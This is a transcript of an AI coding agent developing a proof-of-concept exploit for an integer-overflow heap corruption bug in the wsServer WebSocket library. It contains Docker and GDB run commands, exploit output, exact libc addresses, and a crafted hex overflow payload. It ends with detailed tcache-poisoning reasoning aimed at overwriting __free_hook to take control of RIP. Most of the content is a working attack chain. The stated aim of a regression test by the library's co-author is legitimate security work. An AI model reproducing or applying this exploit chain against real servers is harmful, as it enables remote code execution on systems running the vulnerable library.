tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.

The commands block validates at parse time on this GDB version. Let me use start instead:

Run GDB server + PoC with fixed script
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB Output ==="
cat /tmp/poc_out.txt
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
Did you build with debug symbols? 

No — the Docker image still has the old GDB script (built before I updated it). Let me rebuild:

Rebuild Docker image with updated GDB script
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -5
#11 exporting to image
#11 exporting layers 0.0s done
#11 writing image sha256:de3118efbe51a2bbfdd34b09ef5d8ba2386e809d2db62bb6dcc65e42e81e1a89 done
#11 naming to docker.io/library/ws-poc done
#11 DONE 0.0s
Run rebuilt image + PoC
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt
=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
=== GDB ===
Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

The register offsets are wrong. Let me fix the GDB script to use proper variable names since we compiled with -O0:

Rebuild and run with fixed GDB script
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -3 && \
docker rm -f ws-poc-server 2>/dev/null; \
docker run --rm --name ws-poc-server --network host --privileged ws-poc \
  bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt
#10 writing image sha256:e4e4b2ceb61fd3c60f3d6c5202eec1750f12d9fe01bfd593c8087f6c10115c8c done
#10 naming to docker.io/library/ws-poc done
#10 DONE 0.0s
=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
[+] Connection 1 closed
Check GDB output
$ cat /tmp/poc_out.txt 2>/dev/null
Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at examples/echo/echo.c:118
118	{
=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system        = 0x7ffff7e01290

Excellent results! The GDB output shows the overflow is working perfectly. Key findings:

  • __free_hook = 0x7ffff7f9de48
  • msg buffer at 0x7ffff0000c70, size field 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)
  • Overflow wrote 128 bytes starting at msg[16]
  • The corrupted next chunk at 0x7ffff0000c80 has: size=0x21, fd=0x4141414141414141
  • Server survived: free(msg) goes to tcache without checking the corrupted next chunk

To achieve RIP control, I need to shape the heap so a free tcache chunk sits right after the overflow buffer, then poison its fd pointer. Let me update the strategy: use 48-byte chunks (matching the handshake's base64_encode malloc) and target that tcache bin.


Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.

Discoveries

Vulnerability Details (confirmed by code review + GDB)

  • Location: read_single_frame() in src/ws.c:1410-1552
  • Line 1453: *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
  • Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
  • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
  • Lines 1519-1527: write loop uses original (huge) fsd->frame_length, writing past the undersized buffer

Exploit Arithmetic (verified by GDB)

  • Frame 1: non-FIN binary, 16 bytes → sets msg_idx=16, frame_size=16
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5
  • *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returned
  • Write loop starts at msg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed

GDB Reconnaissance Results (from successful run)

  • Libc addresses (no ASLR, fixed):
    • __free_hook = 0x7ffff7f9de48
    • __malloc_hook = 0x7ffff7f9bb70
    • system = 0x7ffff7e01290
    • exit = 0x7ffff7df5a40
  • msg buffer: chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA), user data at 0x7ffff0000c70
  • Chunk is in a thread arena (NON_MAIN_ARENA flag set)
  • Write loop error at msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)
  • Corrupted area confirmed at 0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141
  • Server survived: free(msg) goes to tcache BEFORE the next-chunk size check, so no crash on the corrupted metadata
  • The next chunk after msg is the TOP CHUNK, not a free tcache chunk — this is why we can't directly poison tcache with the current approach

Why the Server Survives

On glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:

```c
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
    tcache_put(p, tc_idx);
    return;  /* never reaches the corrupted next-chunk check */
}
```

So we need to corrupt a chunk that is already in a tcache bin, not the top chunk.

Revised Exploitation Strategy (tcache poisoning via 48-byte chunks)

The key insight from the recon: we need a free tcache chunk physically adjacent to the overflow buffer. The plan:

  1. Use 48-byte chunks because the handshake's base64_encode does malloc(29) → request2size(29) = 48 → same tcache bin (index 1)
  2. Shaping: Send 1 binary FIN message of size 24. This creates:
    • malloc(48) for msg → chunk A (from top)
    • malloc(48) for echo response → chunk S1 (from top, adjacent to A)
    • free(S1) → tcache[1]: S1 (count=1)
    • free(A) → tcache[1]: A → S1 (count=2)
  3. Exploit frame 1: non-FIN binary, 24 bytes. malloc(48) drains A from tcache[1]. tcache[1] = S1 (count=1). The exploit buffer IS chunk A, and S1 (free, in tcache) is physically adjacent at A+48.
  4. Overflow: starts at msg[24]. Layout relative to msg:
    • msg[24]-msg[31]: rest of chunk A's user data (8 bytes)
    • msg[32]-msg[39] = S1+0: S1's prev_size
    • msg[40]-msg[47] = S1+8: S1's size
    • msg[48]-msg[55] = S1+16: S1's fd pointer ← overwrite target
  5. After overflow: tcache[1] chain = S1 → __free_hook
  6. Two-connection mode: Connection 2's handshake does malloc(29) → 48-byte chunk → drains A from tcache. Then free(accept) puts A back. Sending 3 messages on connection 2: the 3rd malloc(48) returns &__free_hook. The echo response writes frame data there, setting __free_hook to a partially-controlled value. Then free(response) calls __free_hook → RIP jumps to that value.

The __free_hook Value Limitation

The echo response frame header (bytes 0x82, 0x18) is fixed, so the lowest 2 bytes of the value written through __free_hook are not attacker-controlled. For the PoC this is fine — any unmapped address proves RIP control. The frame header bytes are: response[0] = 0x82 (FIN=1, opcode=2), response[1] = 0x18 (length=24).

Server Frame Processing Details

  • Server reads via next_byte() which buffers up to MESSAGE_LENGTH=2048 bytes from socket
  • All client frames MUST have MASK bit set (server reads 4 mask bytes unconditionally)
  • Binary frames (opcode 2) skip UTF-8 validation — use these for shaping
  • The overflow happens in read_single_frame BEFORE validate_utf8_txt is called, so no UTF-8 validation on overflow data
  • Control frames must be FIN and ≤125 bytes
  • Frame format: byte0 (FIN+RSV+opcode), byte1 (MASK+length), optional extended length, 4-byte mask, payload
  • Extended length for 64-bit: bytes 2-9 are big-endian

Heap Layout Notes

  • ws_connection structs are in static client_socks array (BSS), NOT on heap — can't overflow into them
  • ws_getaddress() returns a pointer to client->ip (static buffer), does NOT strdup — no malloc in echo's onclose
  • close_client() only closes socket + destroys mutexes — no malloc
  • printf in onopen may initialize stdout buffer once (large allocation, ~8192 bytes)
  • Handshake allocations per connection: calloc(61) → 64-byte, base64_encode → malloc(29) → 48-byte, malloc(130) → 144-byte, then frees

ws_file() Bug (not our problem)

ws_file() at ws.c:2078 references cli_events which doesn't exist — leftover from a refactoring.

Accomplished

Completed

  1. Created AGENTS.md at repo root — compact instruction file for future agent sessions
  2. Created tests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled using direct gcc invocations (avoids Makefile's -O2 override)
  3. Created tests/poc_rip_control.c — Full PoC client with:
    • TCP connect + WebSocket handshake (random base64 key)
    • Frame builder supporting 7/16/64-bit payload lengths with MASK
    • Configurable heap shaping loop (binary FIN messages, drain echo responses)
    • Two-frame exploit (non-FIN binary + FIN continuation with 64-bit overflow length)
    • Configurable overflow payload (hex string or default fake-chunk pattern)
    • Two-connection mode (-2 flag): overflow on conn 1, trigger on conn 2
    • Compiles cleanly with -std=c99 -Wall -Wextra
  4. Created tests/poc_gdb.txt — GDB script with breakpoints at vulnerable code, shows libc addresses, heap inspection at each phase
  5. Created tests/poc_run.sh — Orchestration script with interactive and auto modes
  6. Built Docker image successfully (ws-poc)
  7. Ran initial reconnaissance — confirmed:
    • The integer overflow triggers correctly
    • Heap corruption happens as predicted (128 bytes written past buffer boundary)
    • The corrupted chunk has fake size 0x21 and fake fd 0x4141414141414141
    • Server survives because free() goes to tcache without checking corrupted next chunk
    • The next chunk is the TOP CHUNK, not a free tcache entry

In Progress / Next Steps

The critical next step is to retune the PoC for 48-byte chunks to poison tcache[1]:

  1. Update the PoC command to use -n 1 -s 24 -f 24 -l 40 with a custom hex payload:

    -o 000000000000000000000000000000003100000000000000<br48def9f7ff7f0000

    This sets S1's prev_size=0, size=0x31 (48|PREV_INUSE), fd=__free_hook (0x7ffff7f9de48 LE)

  2. Update the two-connection mode in poc_rip_control.c to send 3 messages on connection 2 (not just 1), because it takes 3 malloc(48) calls to drain tcache[1] → S1 → __free_hook:

    • Msg 1: drains A from tcache[1]
    • Msg 2: drains S1 from tcache[1], tcache head = __free_hook
    • Msg 3: malloc(48) returns __free_hook, echo writes frame data to it, then free(response) calls __free_hook → SIGSEGV with controlled RIP
  3. Rebuild Docker image with updated GDB script (fix start vs run issue)

  4. Run the tuned PoC and verify in GDB that:

    • S1's fd is overwritten to __free_hook
    • The third malloc(48) on connection 2 returns __free_hook
    • free(response) triggers __free_hook → RIP = controlled value
  5. Demonstrate RIP = 0x????????001882 (or similar) under GDB, proving RIP control

NOT YET DONE

  • Tune the PoC for 48-byte chunk tcache poisoning (the key remaining work)
  • Update two-connection mode to send 3 messages instead of 1
  • Demonstrate actual RIP control crash
  • Document final results

Relevant files / directories

Created

  • AGENTS.md — repo instruction file (completed)
  • tests/Dockerfile.poc — Docker build environment (completed, needs rebuild with updated GDB script)
  • tests/poc_rip_control.c — PoC client (completed, needs update: two-connection mode should send 3 messages instead of 1)
  • tests/poc_gdb.txt — GDB helper script (completed, working with start command)
  • tests/poc_run.sh — orchestration script (completed)

Key existing files read

  • src/ws.c — the vulnerable file, especially:
    • Lines 1410-1552 (read_single_frame): the vulnerable integer overflow
    • Lines 1229-1247 (frame_state_data struct): field offsets (msg_data at 0, frame_length at 40, frame_size at 48, opcode at 64)
    • Lines 155-193 (ws_frame_data struct): huge struct with frm[2048] buffer, frame_size at large offset
    • Lines 1565-1720 (next_complete_frame): frame dispatch loop, error path at line 1713 does free(fsd.msg_data)
    • Lines 1735-1808 (ws_establishconnection): main connection loop, calls onclose after error
    • Lines 563-689 (ws_sendframe_internal): response allocation at line 636: malloc(header + length + 1)
    • Lines 1178-1195 (next_byte): reads from socket into 2048-byte buffer
    • Lines 369-390 (close_client): no malloc/free
    • Lines 514-521 (ws_getaddress): returns static buffer, NO strdup
    • Lines 48-95 (ws_connection struct): static array, not on heap
  • include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8, WS_FIN=128, WS_FR_OP_CONT=0, WS_FR_OP_TXT=1, WS_FR_OP_BIN=2
  • examples/echo/echo.c — target server binary, onclose has no malloc, onmessage calls ws_sendframe_bcast
  • src/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(29) → 48-byte, malloc(130) → 144-byte
  • Makefile — build system, CFLAGS uses += (can't easily override -O2), hence direct gcc invocation in Dockerfile
Ok so we got the corruption working. Plan the control of RIP.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me re-examine the current state of the code and the heap layout to plan the RIP control precisely.


Now let me re-read the key vulnerable code and the echo server to understand the exact allocation/free patterns:


Now let me look at the error path and the connection lifecycle to understand exactly when free(msg_data) happens and what happens after:


Let me look at the handshake flow and the base64_encode allocation:


Now let me look at the do_handshake function to understand all allocations during connection setup:


Now I have a thorough understanding of the codebase. Let me now reason through the exploit strategy carefully.

Let me check the handshake allocation sizes more carefully:

The handshake get_handshake_accept does:

  1. calloc(1, sizeof(char) * (WS_KEY_LEN + WS_MS_LEN + 1)) = calloc(1, 61) → chunk size = 64
  2. base64_encode(hash, SHA1HashSize, NULL) → SHA1HashSize=20 → olen = 20*4/3+4 = 30, + 30/72=0, +1 = 31 → malloc(31) → chunk size = 48 (tcache bin idx 1)
  3. free(str) → frees the 64-byte chunk
  4. Returns accept (the 48-byte chunk)

Then get_handshake_response:

  5. malloc(sizeof(char) * WS_HS_ACCLEN) = malloc(130) → chunk size = 144
  6. free(accept) → frees the 48-byte chunk

Then do_handshake:

  7. free(response) → frees the 144-byte chunk

So per handshake: allocates 64, 48, 144, then frees 64, 48, 144 (in that order).

Now for the echo path (onmessage → ws_sendframe_bcast → ws_sendframe_internal):

  • For a 24-byte binary message: malloc(2 + 24 + 1) = malloc(27) → request2size(27) = 32 → tcache bin idx 0 (for 32-byte chunks)
  • Then free(response) → frees the 32-byte chunk

Wait, for a 24-byte payload the response is malloc(idx_first_rData + length + 1) = malloc(2 + 24 + 1) = malloc(27). request2size(27) = (27 + 16 + 15) & ~15 = 48. Actually let me recalculate:

  • On glibc 2.31, MINSIZE = 32 (for 64-bit), request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Wait no.
  • Actually: REQUEST2SIZE(req) = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
  • SIZE_SZ = 8 (64-bit), MALLOC_ALIGN_MASK = 15
  • So request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Hmm that's a 48-byte chunk.
  • Wait, the minimum chunk size is 32 bytes. And for 48 bytes: that's tcache index (48 / 16) - 1 = 2. Wait...
  • Actually tcache idx = (chunk_size - MINSIZE) / MALLOC_ALIGNMENT = (chunk_size / 16) - 1
  • For 32-byte chunks: idx = (32/16) - 1 = 1
  • For 48-byte chunks: idx = (48/16) - 1 = 2

Wait, let me recalculate properly. On glibc 2.31 x86_64:

  • MALLOC_ALIGNMENT = 16
  • MINSIZE = 32
  • SIZE_SZ = 8
  • MALLOC_ALIGN_MASK = 15
  • csize2tidx(x) = (x - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT

For 32: (32 - 32 + 15) / 16 = 15/16 = 0 → idx 0
For 48: (48 - 32 + 15) / 16 = 31/16 = 1 → idx 1
For 64: (64 - 32 + 15) / 16 = 47/16 = 2 → idx 2

So:

  • handshake base64: malloc(31) → chunk 32 → tcache idx 0
  • handshake str: calloc(61) → chunk 64 → tcache idx 2
  • handshake response: malloc(130) → chunk 144 → tcache idx 7
  • echo 24 bytes: malloc(27) → chunk 32 → tcache idx 0 (same as handshake base64!)

So if we use 24-byte messages for shaping, the echo allocates 32-byte chunks (tcache idx 0), same bin as the handshake base64 allocation.

But the exploit frame 1 also needs to be a specific size. The msg allocation in read_single_frame is realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin). For frame 1 (non-FIN), *msg_idx = 0, fsd->is_fin = 0, so realloc(NULL, frame_length) = malloc(frame_length). If frame_length = 24, then malloc(24) → chunk 32 → tcache idx 0. Same bin.

Now, the key question is: can we get a free chunk from the handshake adjacent to our exploit buffer?

Let me think about this differently. The shaping phase happens on connection 1 after the handshake. The handshake on connection 1 allocates and frees: 64, 32, 144. After free(accept) (the 32-byte base64 chunk), tcache[0] has 1 entry. After free(str) (the 64-byte chunk), tcache[2] has 1 entry.

Then the first echo message (shaping): malloc(24) → gets the freed base64 chunk from tcache[0]. Echo sends: malloc(27) → gets a new chunk from top. Echo frees: free(response) (32-byte, into tcache[0]). Then free(msg) (32-byte, into tcache[0]).

So after 1 shaping message:

  • tcache[0]: msg → response (count=2)

After 2 shaping messages:

  • msg from tcache[0] (pops response), response from top, free both
  • tcache[0]: response2 → msg2 → response1 (count=3? No, tcache max is 7)

Wait, let me trace more carefully.

After handshake frees on connection 1:

  • free(accept) where accept was malloc(31) → chunk 32. tcache[0] = {accept}, count=1
  • free(response) where response was malloc(130) → chunk 144. tcache[7] = {response}, count=1
  • But wait, free(str) happens first in get_handshake_accept before free(accept), and free(accept) happens in get_handshake_response, and free(response) happens in do_handshake.

Actually let me re-read the order:

In get_handshake_accept:

  1. calloc(1, 61) → str (64-byte chunk)
  2. base64_encode(hash, 20, NULL) → malloc(31) → accept (32-byte chunk)
  3. free(str) → tcache[2] = {str}, count=1
  4. return accept

In get_handshake_response:

  5. malloc(130) → response (144-byte chunk)
  6. free(accept) → tcache[0] = {accept}, count=1
  7. return response

In do_handshake:

  8. SEND response
  9. onopen callback
  10. free(response) → tcache[7] = {response}, count=1

So after handshake:

  • tcache[0]: accept (count=1)
  • tcache[2]: str (count=1)
  • tcache[7]: response (count=1)

Now, shaping message 1 (24-byte binary):

  • read_single_frame: malloc(24) → chunk 32. Gets accept from tcache[0]. tcache[0] empty.
  • onmessage → ws_sendframe_internal → malloc(27) → chunk 32. Comes from top.
  • free(response) → tcache[0] = {response_echo1}, count=1
  • Back in the main loop: free(wfd.msg), i.e. free(msg) → tcache[0] = {msg1 → response_echo1}, count=2

So msg1 is at the same address as the original accept chunk, and response_echo1 is adjacent (from top). Actually no - response_echo1 comes from top, which is a different location than accept was.

Hmm. The problem is that we don't know the physical layout. Let me think about this from a higher level.

Actually, the key insight from the previous session's GDB run was:

  • The overflow buffer IS at some address
  • The adjacent chunk was the TOP CHUNK, not a free tcache chunk
  • We need a FREE chunk adjacent to the overflow buffer

The way to achieve this is to have the overflow buffer and an echo response allocated consecutively from top. Then when the echo response is freed, it goes to tcache, and the overflow can corrupt its fd pointer.

But wait - in the current flow, the overflow happens DURING read_single_frame, before the echo response is sent. So the echo response for the exploit message hasn't been allocated yet.

Let me reconsider. The exploit is:

  1. Frame 1 (non-FIN binary, 24 bytes): malloc(24) → chunk A (from top or tcache)
  2. Frame 2 (FIN continuation, overflow length): overflow writes past chunk A

After step 1, the only adjacent thing is whatever comes next from top (which would be the top chunk itself). There's no freed chunk adjacent to A.

Unless... we can pre-shape the heap so that a freed chunk IS adjacent to where A will be allocated.

Strategy:

  1. Send shaping messages that allocate from top in a known pattern
  2. Free specific chunks so they're in tcache
  3. Then the exploit's malloc(24) gets a specific chunk, and the physically next chunk is free in tcache

Let me think about this with concrete steps:

Step 1: Shaping on connection 1

  • Send N messages of size 24 bytes each
  • Each round: malloc(24) from tcache/top, malloc(27) from top, free(27) to tcache[0], free(24) to tcache[0]
  • After N messages, tcache[0] has 2N entries (capped at 7), and top has advanced past all the "in-flight" chunks

Hmm, this is getting complicated. Let me think about what the GDB run showed us.

From the previous session's recon: the overflow was confirmed working - 128 bytes written past the buffer. The server survived because free() went to tcache. The next chunk was the top chunk.

The revised strategy from the summary was to use 48-byte chunks because the handshake's base64_encode does malloc(29) → 48-byte chunk, same tcache bin.

Wait, let me recalculate. base64_encode with SHA1HashSize=20:

  • olen = 20*4/3 + 4 = 30
  • olen += 30/72 = 0 → still 30
  • olen++ = 31 (nul termination)
  • malloc(31): request2size(31) = (31+8+15)&~15 = 54&~15 = 48

So malloc(31) → 48-byte chunk. tcache idx = (48-32+15)/16 = 1.

Now, if we make our shaping messages use a payload size that results in malloc(X) → 48-byte chunk too:

  • For the msg: malloc(X) → 48-byte chunk. Need request2size(X) = 48, which holds for X = 25-40: (25+8+15) = 48 → 48 and (40+8+15) = 63 → 48, while (24+8+15) = 47 → 32. So X must be 25-40.
  • For the echo response: malloc(2 + X + 1) = malloc(X+3). For this to be 48-byte chunk: need (X+3+8+15)&~15=48, so X+3 must be 25-40, meaning X = 22-37.
  • Overlap: X = 25-37 → both msg and echo are 48-byte chunks, tcache idx 1.

Let's use X = 32 for simplicity.

Now the plan:

Connection 1:

  1. Handshake: allocates/frees 64, 48, 144 chunks. After: tcache[1]={accept_base64}
  2. Send 1 shaping message (32 bytes):
    • msg: malloc(32) → gets accept_base64 from tcache[1]. tcache[1] empty.
    • echo response: malloc(35) → from top. Call this chunk R1 (physically after accept_base64? No, accept_base64 is from the handshake which was earlier...)

Hmm wait. The accept_base64 chunk was allocated during the handshake, which allocated: str (64), accept_base64 (48), response (144). They were allocated from top in order. Then str was freed (64-byte → tcache[2]), then accept was freed... no wait.

Let me re-trace the handshake allocation order:

  1. calloc(1, 61) → str, chunk at top, 64 bytes → chunk_str
  2. base64_encodemalloc(31) → accept, chunk at top+64, 48 bytes → chunk_accept
  3. free(str) → chunk_str freed to tcache[2]
  4. Return to get_handshake_response
  5. malloc(130) → response, chunk at top+64+48, 144 bytes → chunk_response
  6. free(accept) → chunk_accept freed to tcache[1]
  7. Return to do_handshake
  8. free(response) → chunk_response freed to tcache[7]

After handshake:

  • Heap layout (from start): [freed chunk_str (64)] [freed chunk_accept (48)] [freed chunk_response (144)] [top]
  • tcache[2] = {chunk_str}
  • tcache[1] = {chunk_accept}
  • tcache[7] = {chunk_response}

Now shaping message 1 (32 bytes):

  • msg: malloc(32) → tcache[1] has chunk_accept → msg = chunk_accept. tcache[1] empty.
  • echo: malloc(35) → need 48-byte chunk. tcache[1] empty → from top. chunk_echo1 at top (after chunk_response).
  • free(response_echo) → tcache[1] = {chunk_echo1}
  • free(msg) → tcache[1] = {chunk_accept → chunk_echo1}, count=2

Now the heap is: [freed chunk_str (64)] [freed chunk_accept (48)] [freed chunk_response (144)] [freed chunk_echo1 (48)] [top]

And tcache[1] = {chunk_accept → chunk_echo1}, count=2.

Now exploit:

  • Frame 1 (non-FIN, 32 bytes): malloc(32) → tcache[1] pops chunk_accept. tcache[1] = {chunk_echo1}, count=1.
    • msg = chunk_accept
    • Adjacent to chunk_accept is chunk_response (144 bytes, freed, in tcache[7])

Wait, that's the wrong bin! chunk_response is a 144-byte chunk in tcache[7], not tcache[1].

OK, so the physically adjacent chunk to chunk_accept is chunk_response (144 bytes). But that's in a different tcache bin. If we corrupt its fd, we'd need a 144-byte malloc to drain it, not a 48-byte malloc.

Hmm. Let me reconsider. I need the physically adjacent chunk to be:

  1. In the same tcache bin as the exploit buffer
  2. Free (in tcache)

Alternative approach: What if I don't use the handshake's freed chunks? What if I just send enough shaping messages so that two consecutive chunks from top end up in the right tcache bin?

After the handshake, the heap looks like: [chunk_str freed (64)] [chunk_accept freed (48)] [chunk_response freed (144)] [top]

If I send shaping messages of size 32:

  • Shaping msg 1:

    • malloc(32) → chunk_accept from tcache[1]
    • echo malloc(35) → from top: chunk_E1 (48 bytes)
    • free(echo1) → tcache[1] = {chunk_E1}
    • free(msg1) → tcache[1] = {chunk_accept → chunk_E1}, count=2
  • Shaping msg 2:

    • malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E1}, count=1.
    • echo malloc(35) → from top: chunk_E2 (48 bytes). Physically after chunk_E1!
    • free(echo2) → tcache[1] = {chunk_E2 → chunk_E1}, count=2
    • free(msg2) → tcache[1] = {chunk_accept → chunk_E2 → chunk_E1}, count=3

Wait, chunk_accept was just written back to tcache[1]. And chunk_E1 and chunk_E2 are consecutive from top. After chunk_E2 comes the top chunk.

  • Shaping msg 3:
    • malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E2 → chunk_E1}, count=2.
    • echo malloc(35) → chunk_E1 from tcache[1]. tcache[1] = {chunk_E2}, count=1.
    • free(echo3) → tcache[1] = {chunk_E1 → chunk_E2}, count=2. (chunk_E1 reused!)
    • free(msg3) → tcache[1] = {chunk_accept → chunk_E1 → chunk_E2}, count=3

Hmm, this is getting tangled. Let me think differently.

I need:

  1. Exploit buffer at address X (48-byte chunk)
  2. Free 48-byte chunk at address X+48 (physically adjacent, in tcache[1])

Then overflow from X corrupts the fd pointer of the free chunk at X+48.

To get this layout, I need two consecutive 48-byte chunks from top, then free the second one.

Method:

  • Send enough shaping messages to consume tcache entries so fresh chunks come from top.
  • Send one more shaping message where msg comes from top (chunk A), echo comes from top (chunk B, adjacent to A). Free echo → tcache[1] gets B. Free msg → tcache[1] gets A → B.
  • Now exploit frame 1: malloc(32) gets A from tcache[1]. tcache[1] = {B}, count=1.
  • A is the exploit buffer. B is physically adjacent at A+48. B is free in tcache[1].
  • Overflow from A into B, corrupting B's fd pointer to &__free_hook.
  • Close connection 1 → free(msg_data) frees A → tcache[1] = {A → __free_hook}, count=2.

Then on connection 2:

  • Handshake base64: malloc(31) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.
  • Handshake frees base64: free(A) → tcache[1] = {A → __free_hook}, count=2.

Wait, but during the handshake, base64 is allocated and then freed. So:

  • malloc(31) → gets A. tcache[1] = {__free_hook}.
  • ... do stuff ...
  • free(accept) → frees A. tcache[1] = {A → __free_hook}, count=2.

Then later on connection 2, send a message:

  • msg: malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.
  • echo: malloc(35) → gets __free_hook from tcache[1]!!! tcache[1] empty.
  • Write frame header + payload to __free_hook address!
  • free(response) where response = __free_hook → calls __free_hook(content) → RIP control!

This is the plan! But we need to be careful about what value gets written to __free_hook.

The echo response is constructed in ws_sendframe_internal:

```c
response = malloc(sizeof(unsigned char) * (idx_first_rData + length + 1));
...
response[0] = (WS_FIN | type);  // 0x82 for binary
response[1] = length & 0x7F;    // payload length (if <= 125)
...
for (i = 0; i < length; i++)
    response[idx_response++] = msg[i];
response[idx_response] = '\0';
```

So response[0] = 0x82, response[1] = payload_length. These overwrite the first 2 bytes of __free_hook.

Then free(response) is called with response pointing to __free_hook. If __free_hook is set to a value, free() will call that value with the response pointer as argument. But __free_hook hasn't been set yet! We're WRITING to __free_hook memory, not setting it as a function pointer.

Wait, I'm confusing things. The tcache poisoning makes malloc() return a pointer TO __free_hook (the variable in libc .bss). We then write our frame data TO that address. The frame data overwrites __free_hook's value.

So after the echo malloc(35) returns &__free_hook:

  • response = &__free_hook
  • response[0] = 0x82 (overwrites byte 0 of __free_hook)
  • response[1] = payload_len (overwrites byte 1)
  • response[2..2+msg_len-1] = msg content (overwrites bytes 2+)

So __free_hook's value becomes: the 8 bytes written starting at response[0].

For a 32-byte binary message:

  • response[0] = 0x82 (FIN=1, opcode=2)
  • response[1] = 0x20 (length=32)
  • response[2..33] = msg[0..31] (our payload content)
  • response[34] = '\0'

__free_hook is at a fixed address. Its VALUE (which is a function pointer) gets overwritten with:

  • bytes 0-1: 0x82, 0x20
  • bytes 2-7: first 6 bytes of our message content

On little-endian x86_64, the function pointer value would be: 0x????????????2082, where the ? bytes are our controlled bytes (from msg[0..5]).

For the PoC, we just need to show RIP control. Any crash at a controlled address is sufficient. So if we send a message with content like 0x4141414141414141..., __free_hook becomes 0x4141414141412082 (or similar).

But actually, we can be smarter. We need the response to be exactly sizeof(unsigned char) * (idx_first_rData + length + 1) bytes. For length <= 125, idx_first_rData = 2. So malloc(2 + length + 1). For this to be a 48-byte chunk: need request2size(2 + length + 1) = 48, so length + 3 must be 25-40, meaning length = 22-37.

If we use length=32: malloc(35) → 48-byte chunk → tcache[1]. Good.

Now, after the echo writes to __free_hook, __free_hook = some value we partially control. Then free(response) is called. Since __free_hook is now set, free() calls __free_hook(response), which is our_value(response).

For a pure PoC, we just need the crash at a controlled RIP. So __free_hook can be any invalid address.

